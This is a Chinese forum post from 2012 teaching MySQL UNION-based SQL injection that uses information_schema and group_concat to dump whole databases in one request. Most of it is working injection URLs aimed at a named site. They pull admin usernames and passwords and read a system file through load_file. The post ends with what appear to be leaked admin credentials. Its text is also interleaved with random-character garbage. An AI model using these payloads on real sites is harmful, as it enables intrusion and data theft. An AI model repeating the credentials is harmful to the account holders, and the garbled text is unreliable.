此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似+ T: z+ k2 t# c8 d+ W7 ]; x+ Y5 b% U
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
' |. R/ x! f" _$ n0 u- Q3 N: C1 q/ R
9 M, w6 i0 m/ @& t% | s# P
3 G( E; E! t$ S' h优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
. `2 A! i+ E# v
$ G% F+ v( t. ?5 {, B) F- s缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...+ E6 g6 T+ n, W4 @$ n* K; L
5 f3 }* y4 F4 P9 E) [ W# ?# @
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
: d* ~7 V6 u+ ?' B6 h$ V$ h在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等+ Y1 N* l( J8 T! ^9 q# d0 G+ o
1 ]! d x" Q, ^
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17, e7 t/ w' g4 z( f
9 o/ i$ ^* M% N: s0 d读出所有库:
& f; D% H4 v8 }( R! Xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
1 u0 U( r9 |: X, J9 T& c1 J
& w1 }( \2 B! H5 U3 O0 Q
- A( Z+ t8 A. i0 e$ F4 d
! X) `2 B. b0 h) \7 x3 K读出所有表:
; b7 n# |/ r6 bhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()
7 J9 ~! _! |- h r9 z8 C6 O& h8 ^. r' V
读出所有表字段:
0 t Z K" G) D* @2 R- U) W( d; A2 Qhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)% C. w% D) t6 v. s! p7 F7 l! ^
*/ (97,100,109,105,110)为admin的ascii码 依次类推. y' i% q- w4 x9 O
7 `* i7 m$ m1 j) V
读出所有表字段里的内容:; B: G" Z! f% L. p6 w$ }# W- P/ p
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin! q4 w& h: B% q0 K# G% p
$ f1 x0 ]0 m# r6 f& g) Q% i" q& {" m4 z8 I) V, _' c
# f9 A- R: m# D3 E; _7 W
1 a6 P) A) \1 C- w2 @, |5 D) x& a( `! F! T; F, o
: D" q, u0 s0 `/ X2 p/ k7 S: Y
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23) d8 Y& N/ L$ e0 B: A
8 x( C$ } G" }) K# B
+ `# X; [; b% vhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23& ]2 F6 \1 ^$ M K3 I
: J) h" ?' T( c; p' r) Phttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
" ~8 z; Q# U% m0 m7 y8 R4 M" ~0 k2 _/ F
8 _0 v O% D! e+ q8 f) Nhttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%236 j" {! C) n) ]. j9 a
" F9 M1 H+ W( o; J) f8 _' G: _8 p
( {! m( A B( a9 A webmaster:dzb521123,simlab:simadmin20043233
Z9 r: x' v8 m |
发表于 2012-9-13 16:37:34
收藏
支持
反对